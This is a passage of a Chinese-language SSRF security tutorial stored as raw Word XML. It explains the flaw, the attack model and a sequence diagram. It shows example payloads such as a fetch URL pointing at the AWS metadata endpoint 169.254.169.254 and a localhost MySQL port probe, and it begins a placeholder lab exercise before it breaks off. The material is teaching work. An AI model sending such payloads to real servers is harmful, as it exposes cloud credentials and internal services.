      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF：服务器被诱导“替攻击者看”不该看的东西</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF（Server-Side</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Forgery，服务端请求伪造）违背的假设是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务器发起的出站请求都源于自身业务逻辑的可信需求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。大多</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用需要对外发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求的能力——调用外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API、抓取网页内容、请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Webhook、从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加载图片或文件。当用户可部分或完全控制服务器发出请求的目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，便可能利用这一能力让服务器替攻击者访问其本不应可达的内部资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。想象一个“网页快照”功能，用户提供一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL，服务器抓取该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内容并返回。这个功能正常时应只访问公网网站。但如果用户提交</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">？服务器会把请求发到自己本地的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库端口，虽然</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议不是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP，但攻击者可观察连接建立行为、响应延迟、错误信息来推断端口是否开放（②环境相关：在某些语言和库中，HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库对非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议响应的处理可能泄露协议信息，或允许协议外请求）。更危险的玩法：提交</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://169.254.169.254/latest/meta-data/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AWS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">云环境中实例元数据服务的固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，返回的信息包含该实例的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IAM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">角色临时凭据（②环境相关：具体危害取决于云平台。AWS/Azure/GCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">均有类似的内部元数据端点）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的典型攻击模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（①通用原理）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者が控制的目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以是内部网络地址（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.x.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.x.x.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、云元数据端点、或本地服务端口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务器作为代理/跳板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，以自身拥有的网络访问权和身份发起请求。这可以绕过外部防火墙和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL（访问控制列表，Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Control </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">List）——因为请求被视为源自内部可信区域。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">危害谱系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（②环境相关，危害因目标网络拓扑和服务配置而异）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：尝试连接内网各</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的各端口，根据返回时间差或错误消息的不同推断服务可达性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内部服务访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：读取内网无鉴权的管理面板、数据库、缓存服务（Redis、Memcached）、或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统——这些服务可能仅信任内网源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，对外网防火墙屏蔽。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">云元数据泄露</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：访问云环境的元数据服务端点，获取凭据、配置信息、甚至用户数据脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">过度危害（RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">路径）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：若内网存在可利用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RCE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Redis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未授权访问写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webshell、Gopher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议攻击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">FastCGI），SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能成为远程代码执行的跳板（③概念路径示意，武器化绕过细节超出授权教学范围）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击流程序列图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（①标准通用）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant A as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外部攻击者</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant S as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant I as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内部资源（元数据/内网服务）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant F as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外部防火墙/ACL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A-&gt;&gt;S: GET /fetch?url=http://169.254.169.254/latest/meta-data/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over S: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用将攻击者提交的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传入后端请求函数</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> S-&gt;&gt;F: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 169.254.169.254 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GET&lt;br&gt;（源自服务器自身</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，为可信内部流量）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F--&gt;&gt;S: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">放行（该请求源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为信任区域）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> S-&gt;&gt;I: GET /latest/meta-data/ HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> I--&gt;&gt;S: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回元数据凭据信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> S--&gt;&gt;A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应体中无意中回显元数据内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（③概念示意：以上流程序列为教学简化版。实际利用成功与否取决于：后端请求库是否限制了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议（如仅允许</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、是否有响应回显（盲</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无法直接看到响应体但可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">带外信道或时序判断）、以及云平台元数据端点是否需要特定请求头（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AWS IMDSv2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token，②环境相关））。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元：SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">概念演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">①目标靶机与搭建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验为概念性示范（③示意），暂不绑定特定公共靶机（需自建或使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验模块，其提供了结构化的教学环境）。核心假设：存在一个存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞的应用端点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/proxy?url=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，它接受用户提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并在服务端发起请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">②逐步命令与操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（占位，实际值因靶机而异②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤一：验证正常业务功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。在浏览器或</w:t>
